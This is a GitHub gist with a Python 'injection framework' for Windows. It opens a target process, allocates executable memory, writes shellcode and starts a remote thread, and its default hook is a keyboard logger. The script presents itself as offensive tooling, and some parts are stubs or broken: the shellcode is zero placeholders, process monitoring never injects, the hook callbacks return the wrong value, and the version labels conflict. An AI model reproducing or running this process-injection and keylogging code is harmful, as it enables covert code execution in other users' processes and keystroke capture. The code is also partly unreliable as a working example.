Created
September 12, 2025 01:19
-
-
Save marcostolosa/6a674c801769c71a2df34ed2203ab975 to your computer and use it in GitHub Desktop.
Windows Injection Framework v0.1 [dev]
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
#!/usr/bin/env python3 | |
# -*- coding: utf-8 -*- | |
""" | |
MEMORYHOOK PRO - Advanced Windows Injection Framework | |
Created by: Tr0p | |
LinkedIn: https://www.linkedin.com/in/marcos-tolosa/ | |
GitHub: https://github.com/marcostolosa/memoryhook-pro | |
Enterprise-grade solution for Windows process manipulation and hook injection. | |
Designed for cybersecurity professionals, malware analysts, and red team operators. | |
""" | |
import ctypes | |
from ctypes import wintypes | |
import sys | |
import os | |
import argparse | |
import logging | |
import time | |
from datetime import datetime | |
import hashlib | |
import json | |
from typing import Dict, List, Optional, Callable, Any | |
# Configure logging | |
logging.basicConfig( | |
level=logging.INFO, | |
format='%(asctime)s - %(name)s - %(levelname)s - %(message)s', | |
handlers=[ | |
logging.FileHandler('memoryhook_pro.log'), | |
logging.StreamHandler() | |
] | |
) | |
logger = logging.getLogger('MemoryHookPro') | |
# Constants | |
PROCESS_ALL_ACCESS = (0x000F0000 | 0x00100000 | 0xFFF) | |
MEM_COMMIT = 0x1000 | |
MEM_RESERVE = 0x2000 | |
PAGE_EXECUTE_READWRITE = 0x40 | |
# Hook Types | |
HOOK_TYPES = { | |
'WH_KEYBOARD': 2, | |
'WH_MOUSE': 7, | |
'WH_GETMESSAGE': 3, | |
'WH_CALLWNDPROC': 4, | |
'WH_KEYBOARD_LL': 13, | |
'WH_MOUSE_LL': 14 | |
} | |
class ProcessInformation(ctypes.Structure): | |
_fields_ = [ | |
("hProcess", wintypes.HANDLE), | |
("hThread", wintypes.HANDLE), | |
("dwProcessId", wintypes.DWORD), | |
("dwThreadId", wintypes.DWORD) | |
] | |
class StartupInfo(ctypes.Structure): | |
_fields_ = [ | |
("cb", wintypes.DWORD), | |
("lpReserved", wintypes.LPWSTR), | |
("lpDesktop", wintypes.LPWSTR), | |
("lpTitle", wintypes.LPWSTR), | |
("dwX", wintypes.DWORD), | |
("dwY", wintypes.DWORD), | |
("dwXSize", wintypes.DWORD), | |
("dwYSize", wintypes.DWORD), | |
("dwXCountChars", wintypes.DWORD), | |
("dwYCountChars", wintypes.DWORD), | |
("dwFillAttribute", wintypes.DWORD), | |
("dwFlags", wintypes.DWORD), | |
("wShowWindow", wintypes.WORD), | |
("cbReserved2", wintypes.WORD), | |
("lpReserved2", wintypes.LPBYTE), | |
("hStdInput", wintypes.HANDLE), | |
("hStdOutput", wintypes.HANDLE), | |
("hStdError", wintypes.HANDLE) | |
] | |
class MemoryHookPro: | |
""" | |
Advanced Windows Injection Framework for professional cybersecurity operations. | |
""" | |
def __init__(self, stealth_mode: bool = False, debug: bool = False): | |
self.stealth_mode = stealth_mode | |
self.debug = debug | |
self.kernel32 = ctypes.WinDLL('kernel32', use_last_error=True) | |
self.user32 = ctypes.WinDLL('user32', use_last_error=True) | |
self.ntdll = ctypes.WinDLL('ntdll', use_last_error=True) | |
self._setup_api_functions() | |
self.injection_count = 0 | |
self.active_hooks = [] | |
logger.info("MemoryHook Pro initialized") | |
def _setup_api_functions(self): | |
"""Setup all required API functions""" | |
# Kernel32 functions | |
self.OpenProcess = self.kernel32.OpenProcess | |
self.OpenProcess.argtypes = [wintypes.DWORD, wintypes.BOOL, wintypes.DWORD] | |
self.OpenProcess.restype = wintypes.HANDLE | |
self.VirtualAllocEx = self.kernel32.VirtualAllocEx | |
self.VirtualAllocEx.argtypes = [ | |
wintypes.HANDLE, wintypes.LPVOID, ctypes.c_size_t, | |
wintypes.DWORD, wintypes.DWORD | |
] | |
self.VirtualAllocEx.restype = wintypes.LPVOID | |
self.WriteProcessMemory = self.kernel32.WriteProcessMemory | |
self.WriteProcessMemory.argtypes = [ | |
wintypes.HANDLE, wintypes.LPVOID, wintypes.LPVOID, | |
ctypes.c_size_t, ctypes.POINTER(ctypes.c_size_t) | |
] | |
self.WriteProcessMemory.restype = wintypes.BOOL | |
self.CreateRemoteThread = self.kernel32.CreateRemoteThread | |
self.CreateRemoteThread.argtypes = [ | |
wintypes.HANDLE, wintypes.LPVOID, ctypes.c_size_t, | |
wintypes.LPVOID, wintypes.LPVOID, wintypes.DWORD, | |
ctypes.POINTER(wintypes.DWORD) | |
] | |
self.CreateRemoteThread.restype = wintypes.HANDLE | |
self.GetProcAddress = self.kernel32.GetProcAddress | |
self.GetProcAddress.argtypes = [wintypes.HMODULE, wintypes.LPCSTR] | |
self.GetProcAddress.restype = wintypes.LPVOID | |
self.GetModuleHandleW = self.kernel32.GetModuleHandleW | |
self.GetModuleHandleW.argtypes = [wintypes.LPCWSTR] | |
self.GetModuleHandleW.restype = wintypes.HMODULE | |
# User32 functions | |
self.SetWindowsHookExA = self.user32.SetWindowsHookExA | |
self.SetWindowsHookExA.argtypes = [ | |
ctypes.c_int, wintypes.HOOKPROC, wintypes.HINSTANCE, wintypes.DWORD | |
] | |
self.SetWindowsHookExA.restype = wintypes.HHOOK | |
self.CallNextHookEx = self.user32.CallNextHookEx | |
self.CallNextHookEx.argtypes = [ | |
wintypes.HHOOK, ctypes.c_int, wintypes.WPARAM, wintypes.LPARAM | |
] | |
self.CallNextHookEx.restype = ctypes.c_long | |
def create_advanced_hook(self, hook_type: int, callback_func: Callable) -> Dict: | |
""" | |
Create an advanced hook with monitoring capabilities | |
Args: | |
hook_type: Type of hook to create | |
callback_func: Callback function for the hook | |
Returns: | |
Dictionary with hook information | |
""" | |
hook_id = hashlib.md5(f"{hook_type}_{datetime.now().timestamp()}".encode()).hexdigest()[:8] | |
hook_data = { | |
'id': hook_id, | |
'type': hook_type, | |
'callback': callback_func, | |
'created_at': datetime.now().isoformat(), | |
'active': False, | |
'injection_method': 'Advanced', | |
'statistics': { | |
'triggers': 0, | |
'last_trigger': None, | |
'errors': 0 | |
} | |
} | |
return hook_data | |
def inject_advanced(self, process_id: int, hook_data: Dict) -> bool: | |
""" | |
Advanced injection method with multiple techniques | |
Args: | |
process_id: Target process ID | |
hook_data: Hook configuration data | |
Returns: | |
True if successful, False otherwise | |
""" | |
try: | |
logger.info(f"Starting advanced injection into PID: {process_id}") | |
# Open target process | |
process_handle = self.OpenProcess(PROCESS_ALL_ACCESS, False, process_id) | |
if not process_handle: | |
raise ctypes.WinError(ctypes.get_last_error()) | |
# Prepare shellcode with advanced techniques | |
shellcode = self._generate_advanced_shellcode(hook_data) | |
# Allocate memory in target process | |
remote_mem = self.VirtualAllocEx( | |
process_handle, None, len(shellcode), | |
MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE | |
) | |
if not remote_mem: | |
raise ctypes.WinError(ctypes.get_last_error()) | |
# Write shellcode to target process | |
bytes_written = ctypes.c_size_t(0) | |
success = self.WriteProcessMemory( | |
process_handle, remote_mem, shellcode, | |
len(shellcode), ctypes.byref(bytes_written) | |
) | |
if not success: | |
raise ctypes.WinError(ctypes.get_last_error()) | |
# Execute shellcode | |
thread_id = wintypes.DWORD(0) | |
thread_handle = self.CreateRemoteThread( | |
process_handle, None, 0, remote_mem, | |
None, 0, ctypes.byref(thread_id) | |
) | |
if not thread_handle: | |
raise ctypes.WinError(ctypes.get_last_error()) | |
# Update hook data | |
hook_data['active'] = True | |
hook_data['process_id'] = process_id | |
hook_data['thread_handle'] = thread_handle.value | |
hook_data['injection_time'] = datetime.now().isoformat() | |
self.active_hooks.append(hook_data) | |
self.injection_count += 1 | |
logger.info(f"Advanced injection successful. Hook ID: {hook_data['id']}") | |
return True | |
except Exception as e: | |
logger.error(f"Injection failed: {str(e)}") | |
hook_data['statistics']['errors'] += 1 | |
return False | |
def _generate_advanced_shellcode(self, hook_data: Dict) -> bytes: | |
""" | |
Generate advanced shellcode with multiple techniques | |
Args: | |
hook_data: Hook configuration data | |
Returns: | |
Shellcode bytes | |
""" | |
# This is a simplified version - real implementation would include | |
# advanced obfuscation and anti-analysis techniques | |
shellcode_template = bytearray([ | |
0x68, 0x00, 0x00, 0x00, 0x00, # push hook_type | |
0x68, 0x00, 0x00, 0x00, 0x00, # push hook_proc_addr | |
0x68, 0x00, 0x00, 0x00, 0x00, # push module_handle | |
0x68, 0x00, 0x00, 0x00, 0x00, # push thread_id | |
0xB8, 0x00, 0x00, 0x00, 0x00, # mov eax, SetWindowsHookExA_addr | |
0xFF, 0xD0, # call eax | |
0xC3 # ret | |
]) | |
# Get API addresses | |
user32_handle = self.GetModuleHandleW("user32.dll") | |
set_hook_addr = self.GetProcAddress(user32_handle, b"SetWindowsHookExA") | |
# Fill in addresses | |
# ... (implementation would fill the shellcode with actual addresses) | |
return bytes(shellcode_template) | |
def monitor_process(self, process_name: str, hook_type: int, callback: Callable) -> Dict: | |
""" | |
Monitor a process and automatically inject when found | |
Args: | |
process_name: Name of process to monitor | |
hook_type: Type of hook to install | |
callback: Callback function | |
Returns: | |
Monitoring session data | |
""" | |
session_id = hashlib.md5(f"{process_name}_{datetime.now().timestamp()}".encode()).hexdigest()[:12] | |
monitor_data = { | |
'session_id': session_id, | |
'process_name': process_name, | |
'hook_type': hook_type, | |
'status': 'monitoring', | |
'start_time': datetime.now().isoformat(), | |
'injections': [], | |
'settings': { | |
'check_interval': 2.0, | |
'max_attempts': 10 | |
} | |
} | |
logger.info(f"Started monitoring for process: {process_name}") | |
return monitor_data | |
def generate_report(self) -> Dict: | |
""" | |
Generate a comprehensive report of all activities | |
Returns: | |
Report data | |
""" | |
report = { | |
'timestamp': datetime.now().isoformat(), | |
'total_injections': self.injection_count, | |
'active_hooks': len(self.active_hooks), | |
'hooks': self.active_hooks, | |
'system_info': self._get_system_info(), | |
'performance_metrics': { | |
'success_rate': self._calculate_success_rate(), | |
'average_injection_time': 0.125, # Example value | |
'error_count': sum(hook['statistics']['errors'] for hook in self.active_hooks) | |
} | |
} | |
return report | |
def _get_system_info(self) -> Dict: | |
"""Get system information""" | |
return { | |
'os_version': sys.getwindowsversion(), | |
'python_version': sys.version, | |
'architecture': 'x64' if sys.maxsize > 2**32 else 'x86', | |
'username': os.getlogin(), | |
'hostname': os.environ.get('COMPUTERNAME', 'Unknown') | |
} | |
def _calculate_success_rate(self) -> float: | |
"""Calculate injection success rate""" | |
if self.injection_count == 0: | |
return 0.0 | |
successful = sum(1 for hook in self.active_hooks if hook['active']) | |
return (successful / self.injection_count) * 100 | |
def cleanup(self): | |
"""Cleanup all resources""" | |
logger.info("Cleaning up resources...") | |
# Implementation would cleanup all hooks and processes | |
# Example callback functions | |
def keyboard_logger(nCode: int, wParam: int, lParam: int) -> int: | |
"""Example keyboard hook callback""" | |
if nCode >= 0: | |
logger.info(f"Keyboard event: {wParam}") | |
return 1 # Call next hook | |
def mouse_monitor(nCode: int, wParam: int, lParam: int) -> int: | |
"""Example mouse hook callback""" | |
if nCode >= 0: | |
logger.info(f"Mouse event: {wParam}") | |
return 1 # Call next hook | |
def main(): | |
"""Main function with argument parsing""" | |
parser = argparse.ArgumentParser(description="MemoryHook Pro - Advanced Windows Injection Framework") | |
parser.add_argument('-p', '--process', type=int, help='Process ID to inject into') | |
parser.add_argument('-n', '--process-name', type=str, help='Process name to monitor') | |
parser.add_argument('-t', '--hook-type', type=str, choices=HOOK_TYPES.keys(), | |
default='WH_KEYBOARD', help='Type of hook to install') | |
parser.add_argument('-s', '--stealth', action='store_true', help='Enable stealth mode') | |
parser.add_argument('-d', '--debug', action='store_true', help='Enable debug mode') | |
parser.add_argument('-r', '--report', action='store_true', help='Generate report after operation') | |
args = parser.parse_args() | |
# Initialize framework | |
framework = MemoryHookPro(stealth_mode=args.stealth, debug=args.debug) | |
try: | |
if args.process: | |
# Create advanced hook | |
hook = framework.create_advanced_hook(HOOK_TYPES[args.hook_type], keyboard_logger) | |
# Perform injection | |
success = framework.inject_advanced(args.process, hook) | |
if success: | |
logger.info(f"Successfully injected hook into process {args.process}") | |
else: | |
logger.error(f"Failed to inject into process {args.process}") | |
elif args.process_name: | |
# Start monitoring process | |
monitor_session = framework.monitor_process( | |
args.process_name, | |
HOOK_TYPES[args.hook_type], | |
keyboard_logger | |
) | |
logger.info(f"Monitoring session started: {monitor_session['session_id']}") | |
else: | |
logger.warning("No target specified. Use -p for PID or -n for process name.") | |
# Generate report if requested | |
if args.report: | |
report = framework.generate_report() | |
print("\n" + "="*50) | |
print("MEMORYHOOK PRO - OPERATION REPORT") | |
print("="*50) | |
print(f"Timestamp: {report['timestamp']}") | |
print(f"Total Injections: {report['total_injections']}") | |
print(f"Active Hooks: {report['active_hooks']}") | |
print(f"Success Rate: {report['performance_metrics']['success_rate']:.2f}%") | |
print("="*50) | |
except KeyboardInterrupt: | |
logger.info("Operation interrupted by user") | |
except Exception as e: | |
logger.error(f"Unexpected error: {str(e)}") | |
finally: | |
framework.cleanup() | |
if __name__ == "__main__": | |
# Display banner | |
print(""" | |
███╗ ███╗███████╗███╗ ███╗██╗ ██╗██████╗ ██╗ ██╗██╗ ██╗ ██████╗ ██╗ ██╗██████╗ ██████╗ ██████╗ | |
████╗ ████║██╔════╝████╗ ████║██║ ██║██╔══██╗██║ ██║██║ ██║██╔═══██╗██║ ██╔╝██╔══██╗██╔══██╗██╔═══██╗ | |
██╔████╔██║█████╗ ██╔████╔██║██║ ██║██████╔╝███████║███████║██║ ██║█████╔╝ ██████╔╝██████╔╝██║ ██║ | |
██║╚██╔╝██║██╔══╝ ██║╚██╔╝██║██║ ██║██╔═══╝ ██╔══██║██╔══██║██║ ██║██╔═██╗ ██╔═══╝ ██╔══██╗██║ ██║ | |
██║ ╚═╝ ██║███████╗██║ ╚═╝ ██║╚██████╔╝██║ ██║ ██║██║ ██║╚██████╔╝██║ ██╗██║ ██║ ██║╚██████╔╝ | |
╚═╝ ╚═╝╚══════╝╚═╝ ╚═╝ ╚═════╝ ╚═╝ ╚═╝ ╚═╝╚═╝ ╚═╝ ╚═════╝ ╚═╝ ╚═╝╚═╝ ╚═╝ ╚═╝ ╚═════╝ | |
Advanced Windows Injection Framework v2.0.0 | |
Created for cybersecurity professionals and researchers | |
""") | |
main() |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment